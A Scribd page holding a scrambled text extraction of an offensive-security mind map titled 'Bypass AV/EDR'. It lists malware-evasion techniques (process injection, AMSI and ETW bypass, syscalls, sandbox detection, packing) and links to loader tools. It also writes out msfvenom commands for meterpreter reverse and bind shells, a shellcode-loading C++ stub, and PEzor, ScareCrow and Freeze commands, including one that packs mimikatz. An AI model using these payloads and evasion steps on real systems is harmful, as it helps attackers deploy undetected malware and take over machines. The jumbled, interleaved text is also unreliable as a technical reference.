Scribd Logo
Upload

Welcome to Scribd!

  • The Road

    Uploaded by

    steproclaster
    8 views1 page

    Original Title

    The Road (1)

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    8 views1 page

    The Road

    Uploaded by

    steproclaster

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 1

    ‎with suspended

    ‎Packing ‎https://pentester.blog/?p=39 ‎CRT


    ‎ ttps://damonmohammadbagher.medium.com/
    h
    ‎bypassing-anti-virus-by-creating-remote-thread-
    ‎Polymorph ‎https://www.exploit-db.com/papers/13874
    ‎into-target-process-45f145b2ac7a

    ‎ ttps://www.ired.team/offensive-security/
    h
    ‎Signature hiding ‎defense-evasion/av-bypass-with-metasploit- ‎ ttps://subscription.packtpub.com/book/
    h
    ‎templates ‎security/9781789610789/8/ch08lvl1sec50/
    ‎executing-the-inject-code-using-apc-queuing
    ‎ ttps://improsec.com/tech-blog/bypassing-
    h
    ‎ROP
    ‎control-flow-guard-on-windows-10-part-ii ‎ ttps://github.com/LloydLabs/
    h
    ‎APC (Asyncronous Procedure Call)
    ‎ntqueueapcthreadex-ntdll-gadget-injection
    ‎ ttps://joshpitts.medium.com/hooking-control-
    h
    ‎flow-guard-cfg-for-fun-and-profit- ‎ ttps://decoded.avast.io/janvojtesek/raspberry-
    h
    ‎31f951485545 ‎robins-roshtyak-a-little-lesson-in-trickery/
    ‎CFG
    ‎ ttps://citeseerx.ist.psu.edu/document?repid=
    h
    ‎rep1&type=pdf&doi= ‎ ttps://www.ired.team/offensive-security/code-
    h
    ‎ade1cc22ee994c1b353326ae4cedccd29f33b8d ‎injection-process-injection/process-hollowing-
    ‎0 ‎and-pe-image-relocations#relocation
    ‎Static ‎Process hollowing
    ‎CFG flattening ‎http://ac.inf.elte.hu/Vol_030_2009/003.pdf ‎ ttps://sevrosecurity.com/2020/04/08/
    h
    ‎process-injection-part-1-createremotethread/
    ‎Pro tips : A shellcode sent in 3 open sources
    ‎ ttps://learn.microsoft.com/en-us/dotnet/
    h
    ‎packer will have more chance to be caught than
    ‎Change logo/icon ‎csharp/language-reference/compiler-options/
    ‎a manual obfuscation ‎ ttps://attack.mitre.org/techniques/T1055/
    h
    ‎resources?redirectedfrom=MSDN ‎Thread execution hijacking
    ‎003/

    ‎Change date of compilation

    fdsfsdfs ‎https://github.com/TheD1rkMtr/D1rkLrd
    ‎ ttps://rastamouse.me/memory-patching-amsi-
    h
    ‎PSC (Ptrace System Calls)

    ‎bypass/
    ‎https://github.com/xuanxuan0/DripLoader ‎ ttps://thehackernews.com/2017/12/malware-
    h
    ‎C++ ‎Process Doppelganging
    sec.co.uk/2018/06/exploring- ‎process-doppelganging.html
    https://github.com/Hagrid29/PELoaderBypass AMSI -and-logging-evasion/

    ‎ ttps://disman.tl/2015/01/30/an-improved-
    h
    ‎ ttps://www.pentestpartners.com/security-
    h ‎Reflective dll injection
    ‎reflective-dll-injection-technique.html
    ‎blog/patchless-amsi-bypass-using-sharpblock/
    ‎python ‎https://github.com/icyguider/Shhhloader ‎https://github.com/fancycode/MemoryModule
    ‎Description


    ‎https://github.com/cribdragg3r/Alaris
    ‎C2 by DNS ‎Dll injection ‎https://www.ired.team/offensive-security/code-
    ‎injection-process-injection/dll-injection
    ‎C ‎https://github.com/trustedsec/COFFLoader
    ‎Network ‎P2P (hide ip from C2)
    ‎ ttps://book.hacktricks.xyz/windows-
    h
    ‎ ttps://github.com/CMEPW/Selha/blob/main/
    h ‎DLL Sideloading & Proxying ‎hardening/windows-av-bypass#dll-sideloading-
    ‎C/aes-loader-stageless.c ‎HTTPS
    ‎and-proxying
    ‎ ttps://medium.com/@merasor07/av-edr-
    h
    ‎https://github.com/aeverj/NimShellCodeLoader ‎evasion-using-direct-system-calls-user-mode- ‎ ou put your region in RW, you write your
    Y
    ‎Nim ‎vs-kernel-mode-fad2fdfed01a ‎shellcode, then you reprotect in RX, then you
    ‎Direct syscalls ‎RWX
    ‎ ttps://github.com/sh3d0ww01f/nim_
    h ‎run the thread. This way your region is never in
    ‎shellloader ‎https://thewover.github.io/Dynamic-Invoke/ ‎rwx

    ‎ ttps://www.purpl3f0xsecur1ty.tech/2021/03/
    h
    ‎https://github.com/EddieIvan01/gld ‎WaitForSingleObjectEx
    ‎30/av_evasion.html ‎ ttps://www.mdsec.co.uk/2022/04/process-
    h
    ‎Go ‎dynamic ‎injection-via-component-object-model-com-
    ‎https://github.com/zha0gongz1/DesertFox ‎Foliage ‎irundowndocallback/
    ‎COM Hijack ‎Dll
    ‎https://evasions.checkpoint.com/techniques/
    ‎Delayed execution ‎https://0xpat.github.io/Abusing_COM_Objects/
    ‎ small sleep obfuscation technique that uses
    A ‎timing.html#delayed-execution
    ‎https://github.com/b1tg/rs_shellcode ‎Ekko
    ‎CreateTimerQueueTimer Win32 API ‎Exe
    ‎ ttps://github.com/S4ntiagoP/donut/tree/
    h
    ‎Rust ‎https://github.com/r4ime/shellcode_loader ‎ ttps://www.cyberbit.com/blog/endpoint-
    h ‎syscalls
    ‎ ttps://github.com/janoglezcampos/
    h
    ‎Remote thread ‎security/malware-mitigation-when-direct-
    dfsdfsf
    ‎https://github.com/cr7pt0pl4gu3/Pestilence
    ‎Deathsleep
    ‎DeathSleep
    ‎system-calls-are-used/
    ‎Hta

    ‎ https://blog.securityevaluators.com/creating-
    < ‎ ttps://github.com/hasherezade/pe_to_
    h
    ‎C++ dsec.co.uk/2020/03/hiding-
    ‎av-resistant-malware-part-1-7604b83ea0c0 ‎shellcode ‎Cpl

    ‎Crystal
    OH FFWKLFWFWFW ‎User APC
    ‎ ttps://www.cyberbit.com/endpoint-security/
    h
    ‎malware-mitigation-when-direct-system-calls-
    ‎C ‎https://github.com/reveng007/ReflectiveNtdll TheWover/DInvoke ‎are-used/ ‎https://github.com/monoxgas/sRDI ‎Link

    ‎Bypass AV/EDR ‎Dropper ‎Manual loader ‎Automatic loader ‎Generate shellcode ‎Manual obfuscation ‎Automatic obfuscation ‎Process injection ‎Detect virtual machines (Sandbox) ‎From PE to shellcode ‎From alive beacon ‎Extensions

    ‎ include <iostream>
    # ‎ sfvenom -p windows/x64/meterpreter/
    m ‎https://github.com/sevagas/macro_pack ‎Count processus number ‎if >=40 its probably not a VM ‎Havoc ‎dotnet (object file)
    ‎#include <Windows.h> ‎reverse_tcp LHOST=<SERVER> LPORT=< ‎Office macro
    ‎ ‎PORT> -f raw ‎https://github.com/optiv/Ivy ‎User interaction ‎Send MessageBoxW
    ‎int main(void) { ‎From .net to BoF ‎https://github.com/CCob/BOF.NET
    .‎ 1 allocating memory
    ‎.2 moving shellcode into that memory ‎ HMODULE hMod = LoadLibrary("shellcode. ‎ sfvenom -p windows/meterpreter/reverse_
    m ‎https://github.com/phra/PEzor ‎Software ‎Check for internet ‎Cobalt ‎BoF (Beacon object file)
    ‎dll"); ‎msfvenom ‎tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt- ‎ ttps://github.com/trustedsec/CS-Situational-
    h
    ‎.3 executing the shellcode ‎C
    ‎ if (hMod == nullptr) { ‎key thisisakey -f dll ‎Awareness-BOF
    ‎https://github.com/klezVirus/inceptor ‎Datetime on compilation
    ‎ cout << "Failed to load shellcode.dll" << endl;
    ‎} ‎ sfvenom -p windows/meterpreter/bind_tcp -e
    m ‎Packing ‎https://github.com/govolution/avet ‎Check for Computer name ‎VM = DESKTOP-[0-9A-Z]{7}
    ‎ ‎x86/shikata_ga_nai '\x00' -i 30 RHOST=10.0.0.
    ‎ return 0; ‎68 LPORT=9050 -f c | tr -d '"' | tr -d '\n' | more ‎https://github.com/Nariod/RustPacker
    ‎} ‎ ttps://github.com/CMEPW/bof-collection/
    h
    ‎CPUID timing
    ‎blob/main/src/checkVM/checkVM2.c
    ‎C2 (Cobalt/Havoc what ever) ‎ ttps://github.com/DavidBuchanan314/
    h
    ‎@Jenaye_fr  ‎ ttps://medium.com/securebit/bypassing-av-
    h ‎monomorph ‎Hardware
    ‎ ypical user workstation has a processor with
    T
    ‎through-metasploit-loader-64-bit-
    ‎LeDocteurDesBits ‎at least 2 cores, a minimum of 2 GB of RAM
    ‎9abe55e3e0c8 ‎ ttps://nytrosecurity.com/2019/06/30/writing-
    h ‎https://github.com/upx/upx
    ‎C++ ‎ASM ‎and a 100 GB hard drive
    ‎Crédits ‎shellcodes-for-windows-x64/
    ‎michmich1000  ‎ ttps://github.com/ReversingID/Shellcode-
    h ‎https://github.com/EgeBalci/sgn/
    ‎Loader/tree/master/windows ‎ ttps://evasions.checkpoint.com/techniques/
    h
    ‎@Zabannn ‎ ine hyperion.exe /root/payloads/shellter/
    w ‎OSX
    ‎Hyperion ‎https://github.com/CCob/SharpBlock ‎macos.html#macos-sandbox-methods
    ‎shellter_putty_reverse_x86.exe
    ‎ ttps://sevrosecurity.com/2019/05/25/bypass-
    h
    ‎.NET ‎ ttps://github.com/danielbohannon/Invoke-
    h
    ‎windows-defender-with-a-simple-shell-loader/ ‎Tools ‎https://github.com/a0rtega/pafish
    ‎ ttps://vxug.fakedoma.in/papers/VXUG/
    h ‎Obfuscation
    ‎Static ‎AMSI Bypass
    ‎Exclusive/
    ‎C
    ‎FromaCprojectthroughassemblytoshellcodeHas ‎https://github.com/klezVirus/Chameleon
    ‎herezade.pdf
    ‎ taged and stageless
    S ‎https://github.com/tokyoneon/Chimera
    ‎By definition, when we talk about staged we are
    ‎referring to a payload in addition to a piece This ‎ careCrow -I /Path/To/ShellCode -d facebook.
    S
    ‎https://github.com/optiv/ScareCrow
    ‎means that there will be several actions (often ‎com
    ‎2) between the client and the server. ‎Signature hiding
    ‎ ‎https://github.com/paranoidninja/CarbonCopy
    ‎If you use meterpreter, please use the following
    ‎commands ‎ ttps://gist.github.com/snovvcrash/
    h
    ‎ ‎LOLBIN ‎RemComSvc
    ‎123945e8f06c7182769846265637fedb
    ‎set EnableStageEncoding true;
    ‎set StageEncoder x64/xor_dynamic; ‎Entropy ‎https://github.com/kleiton0x00/Shelltropy

    ‎https://github.com/optiv/ScareCrow

    ‎ ttps://gist.github.com/tandasat/
    h
    ‎e595c77c52e13aaee60e1e8b65d2ba32
    ‎Disable ETW

    ‎https://github.com/Soledge/BlockEtw

    ‎https://github.com/CCob/SharpBlock

    ‎ reeze -I /PathToShellcode -encrypt -sandbox -


    F
    ‎https://github.com/optiv/Freeze
    ‎o packed.exe
    Type your text ‎ Ezor.sh -sgn -unhook -antidebug -text -
    P
    ‎https://github.com/phra/PEzor ‎syscalls -sleep=120 mimikatz/x64/mimikatz.
    ‎exe -z 2
    ‎Dynamic ‎Indirect syscall
    ‎https://github.com/optiv/ScareCrow

    ‎https://github.com/klezVirus/SysWhispers3

    ‎https://github.com/jthuraisamy/SysWhispers2

    ‎Disable AV ‎https://github.com/APTortellini/unDefender

    ‎Block DLL ‎https://github.com/CCob/SharpBlock

    ‎Detect virtual machines ‎https://github.com/a0rtega/pafish

    You might also like